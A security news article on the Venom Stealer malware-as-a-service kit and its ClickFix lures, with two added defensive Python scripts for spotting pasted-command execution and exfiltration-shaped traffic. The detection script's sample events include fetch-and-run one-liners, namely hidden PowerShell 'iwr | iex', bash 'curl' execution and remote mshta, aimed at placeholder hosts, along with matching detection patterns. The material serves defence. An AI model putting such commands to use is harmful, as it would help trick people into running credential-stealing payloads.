A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks.

Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found.
A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer lets attackers build a persistent, multistage pipeline that runs from the initial ClickFix interaction through credential theft, cryptocurrency wallet access, and data exfiltration.
"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report. "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running."
Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There is a vetted application process, Telegram-based licensing, and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per operator from the web panel.
Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvest credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report.
Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. In March alone, its developer has shipped multiple updates to the platform.
Step-By-Step ClickFix by Design
An attack built with Venom Stealer begins when a prospective victim lands on a ClickFix page hosted by the operator. The platform ships four lure templates for each supported OS (Windows and macOS): a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open the Run dialog or a Terminal, paste a command, and press Enter.
"Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained.
Windows payloads available in the kit include .exe, .ps1 (or fileless via PowerShell), .hta, and .bat options, while the macOS templates use bash and curl, he said. The platform also lets operators configure custom domains through Cloudflare DNS, so the panel URL never appears in the pasted command.
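The "user-initiated" execution path Williams describes is still detectable, just not by parent-child relationships alone: explorer.exe spawning powershell.exe is what every Win+R launch looks like. The Python below is an added example, not code from the BlackFog report or from Venom Stealer. It scores Sysmon-style process-creation events by command-line traits that are generic to pasted ClickFix one-liners (download cradle, hidden window, in-memory execution, a reassuring "I am not a robot" comment), treats explorer.exe or Terminal parentage as context worth a single point, and recovers what a user actually pasted from the Run dialog's RunMRU registry key. The interpreter list, trait patterns, threshold and sample events are assumptions chosen for the demonstration, and all event records are constructed, not captured telemetry.

```python
"""Score process-creation telemetry for ClickFix-style execution.

Added example for this article; it is not code from the BlackFog report or
from Venom Stealer. The event layout mirrors Sysmon Event ID 1 / Windows
4688 fields (parent image, image, command line); all records below are
constructed, not captured telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent_image: str
    image: str
    command_line: str


# Run-dialog launches on Windows are children of explorer.exe; the macOS
# templates have the victim paste into Terminal. Neither parent is suspicious
# on its own, which is exactly why parent/child rules alone miss ClickFix.
RUN_DIALOG_PARENTS = {"explorer.exe"}
TERMINAL_PARENTS = {"terminal", "iterm2"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh", "curl"}

# Command-line traits typical of pasted ClickFix one-liners (generic ClickFix
# tradecraft, not traits taken from the report). Each match adds one point.
TRAITS = {
    "download_cradle": re.compile(
        r"(?i)\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|"
        r"downloadfile|bitsadmin|certutil)\b"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    "no_profile": re.compile(r"(?i)-nop\b|-noprofile\b"),
    "encoded_command": re.compile(
        r"(?i)-e(?:c|nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}"),
    "inline_exec": re.compile(
        r"(?i)\|\s*iex\b|invoke-expression|\|\s*(?:ba)?sh\b|\$\(\s*(?:curl|wget)\b"),
    "remote_url": re.compile(r"(?i)https?://"),
    "remote_script_fetch": re.compile(r"(?i)https?://\S+\.(?:hta|ps1|bat|sh|vbs)\b"),
    # Lure pages often append a reassuring comment so the Run box shows
    # "I am not a robot" rather than the payload.
    "fake_verification": re.compile(r"(?i)#.*(?:not a robot|verif|captcha|cloudflare)"),
}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Only interpreter launches are scored at all."""
    reasons: list[str] = []
    if basename(ev.image) not in INTERPRETERS:
        return 0, reasons
    parent = basename(ev.parent_image)
    if parent in RUN_DIALOG_PARENTS:
        reasons.append("run_dialog_parent")   # context, worth one point only
    elif parent in TERMINAL_PARENTS:
        reasons.append("terminal_parent")
    for name, rx in TRAITS.items():
        if rx.search(ev.command_line):
            reasons.append(name)
    return len(reasons), reasons


def detect(events: list[ProcEvent], threshold: int = 3) -> list[dict]:
    """Alert on interpreter launches whose score reaches the threshold.
    A bare 'cmd' typed into Run scores 1 and stays quiet."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"ts": ev.ts, "image": basename(ev.image),
                           "score": score, "reasons": reasons})
    return alerts


def runmru_commands(values: dict[str, str]) -> list[str]:
    """Recover Run-dialog history, most recent first, from the values of
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Each slot ('a', 'b', ...) holds 'command\\1'; MRUList gives the order."""
    history = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


# Constructed sample events: one Windows lure, a harmless Run of cmd, a
# scheduled script, one macOS lure, and a remote HTA via mshta.
SAMPLE_EVENTS = [
    ProcEvent("10:01:02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -nop -c "iwr https://verify.example/check | iex"'
              ' # I am not a robot - Verification ID: 7213'),
    ProcEvent("10:03:40", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd"),
    ProcEvent("10:05:11", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent("10:06:00",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
              "/bin/bash", 'bash -c "$(curl -fsSL https://update.example/fix.sh)"'),
    ProcEvent("10:07:30", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta https://fonts.example/install.hta"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["ts"]} {a["image"]} score={a["score"]} {",".join(a["reasons"])}')
```

Feed `runmru_commands` the values read from the RunMRU key with `winreg` on a live host; the key persists after the Run dialog closes, and PowerShell's ConsoleHost_history.txt and script block logging (Event ID 4104, where enabled) likewise record the pasted command, so the execution step leaves artifacts even if the later credential-decryption step is quiet.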
Once the payload executes, it sweeps every Chromium- and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.
Evasion is built into the execution stage as well. Chrome's v10 and v20 password encryption formats (not browser versions: v10 values are protected with a DPAPI-wrapped key from the browser's Local State file, v20 values with the newer App-Bound Encryption) are bypassed using what Williams described as a silent privilege escalation that extracts the decryption key without triggering a User Account Control (UAC) prompt and, he noted, leaves no forensic artifacts. The attack chain also captures a system fingerprint and an inventory of installed browser extensions alongside the credentials, giving cybercriminals a complete profile of each target, he added.
"All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult."
Persistent Data-Theft Pipeline
The attack transfers any discovered wallet data to a server-side, GPU-powered cracking engine that auto-cracks crypto wallets such as MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Additionally, a March 9 update to Venom Stealer added a File Password and Seed Finder, which searches the filesystem for locally saved seed phrases and feeds anything found into the cracking pipeline.
"Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote.
And while some newer infostealer variants do have some persistence capability, Venom goes further by staying resident after the initial compromise and continuously monitoring Chrome's Login Data database, capturing newly saved credentials in real time, he added.
"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult."
How to Reduce ClickFix Exposure
Researchers from Proofpoint first spotted ClickFix attacks about two years ago, and the technique has since taken off across the cybercriminal community. It instills urgency by telling targets that something is wrong and must be fixed or updated, then uses familiar CAPTCHA-style prompts to lull them into a false sense of security. The aim is to trick users into running malicious commands against their own machines.
Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering, Williams advised. The Group Policy setting in question is "Remove Run menu from Start Menu," which sets the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer and also blocks the Win+R shortcut. Note that PowerShell's execution policy is not a security boundary, since a pasted command can simply carry -ExecutionPolicy Bypass; restricting PowerShell meaningfully means application control such as AppLocker or WDAC, or Constrained Language Mode, and the same control should cover mshta.exe and the other script hosts the kit's payloads use.
"Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."
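Williams' point about outbound visibility can be turned into a concrete check on host telemetry. The Python below is an added example, not code from the BlackFog report: it groups per-process connection records (the shape an EDR, or a Sysmon Event ID 3 feed joined with flow data, gives you) and flags groups that look like the pipeline described above, that is, an immediate large upload by an interpreter followed by regular small check-ins, or a one-shot upload-heavy session by an unknown binary. The browser set, the allow-list of known agents, the 5x upload ratio and the jitter threshold are assumptions for the demo and should be tuned to your own baseline; every record and timestamp is constructed, and RFC 5737 documentation addresses stand in for external hosts.

```python
"""Flag exfiltration-style egress in per-process connection records.

Added example for this article, not code from the BlackFog report. The
record shape (process, destination, bytes in each direction) is what an EDR
or a Sysmon Event ID 3 feed joined with flow data provides; every record
below is constructed. RFC 5737 documentation addresses stand in for
external hosts.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import mean, pstdev


@dataclass
class Conn:
    ts: datetime
    process: str      # image basename
    dest: str         # IP address or hostname
    port: int
    bytes_out: int
    bytes_in: int


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Agents that legitimately beacon to the internet. A real baseline comes from
# the environment's own telemetry; this list is an assumption for the demo.
KNOWN_AGENTS = {"onedrive.exe", "teams.exe", "outlook.exe", "msmpeng.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]


def is_external(host: str) -> bool:
    """True for routable destinations; internal ranges and local names are skipped."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return not host.lower().endswith((".local", ".internal", ".lan"))
    return not any(ip in net for net in INTERNAL_NETS)


def analyze(conns, min_hits=4, max_jitter=0.25, min_bytes_out=200_000):
    """Group connections by (process, destination, port) and score each group:
    non_browser_web_egress  a non-browser process talking HTTP(S) outbound
    upload_heavy            bytes out >= min_bytes_out and > 5x bytes in
    regular_beacon          >= min_hits connections with near-constant spacing
    A group is reported when two or more traits apply."""
    groups = defaultdict(list)
    for c in conns:
        proc = c.process.lower()
        if proc in KNOWN_AGENTS or not is_external(c.dest):
            continue
        groups[(proc, c.dest, c.port)].append(c)

    findings = []
    for (proc, dest, port), cs in groups.items():
        cs.sort(key=lambda c: c.ts)
        out, inn = sum(c.bytes_out for c in cs), sum(c.bytes_in for c in cs)
        reasons = []
        if proc not in BROWSERS and port in (80, 443):
            reasons.append("non_browser_web_egress")
        if out >= min_bytes_out and out > 5 * inn:
            reasons.append("upload_heavy")
        if len(cs) >= min_hits:
            gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(cs, cs[1:])]
            if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
                reasons.append("regular_beacon")
        if len(reasons) >= 2:
            findings.append({"process": proc, "dest": f"{dest}:{port}",
                             "connections": len(cs), "bytes_out": out,
                             "reasons": reasons})
    return sorted(findings, key=lambda f: len(f["reasons"]), reverse=True)


def t(hh, mm, ss):
    return datetime(2025, 3, 10, hh, mm, ss)   # constructed timestamps


SAMPLE_CONNS = [
    # Interpreter dumps browser data seconds after the paste, then checks in
    # every ~5 minutes with whatever Login Data changes it has picked up.
    Conn(t(10, 1, 5), "powershell.exe", "203.0.113.7", 443, 1_800_000, 900),
    Conn(t(10, 6, 5), "powershell.exe", "203.0.113.7", 443, 4_096, 300),
    Conn(t(10, 11, 3), "powershell.exe", "203.0.113.7", 443, 12_288, 300),
    Conn(t(10, 16, 6), "powershell.exe", "203.0.113.7", 443, 4_096, 300),
    Conn(t(10, 21, 4), "powershell.exe", "203.0.113.7", 443, 40_960, 300),
    # One-shot upload by an unknown binary: no beacon, still upload-heavy.
    Conn(t(10, 2, 0), "updater.exe", "198.51.100.9", 443, 3_000_000, 500),
    # Ordinary browsing: download-heavy, from a browser.
    Conn(t(10, 0, 0), "chrome.exe", "198.51.100.20", 443, 2_000, 500_000),
    Conn(t(10, 4, 0), "chrome.exe", "198.51.100.20", 443, 2_000, 500_000),
    Conn(t(10, 9, 0), "chrome.exe", "198.51.100.20", 443, 2_000, 500_000),
    # Allow-listed sync client and an internal SMB session are ignored.
    Conn(t(10, 0, 30), "OneDrive.exe", "198.51.100.40", 443, 300_000, 1_000),
    Conn(t(10, 3, 0), "powershell.exe", "10.0.0.5", 445, 500_000, 2_000),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_CONNS):
        print(f)
```

The logic never inspects payload contents, which is the right assumption when the operator fronts the panel with a custom domain behind Cloudflare and TLS: what it keys on is the shape of the traffic, an interpreter or unknown binary pushing far more than it pulls, and doing so on a schedule.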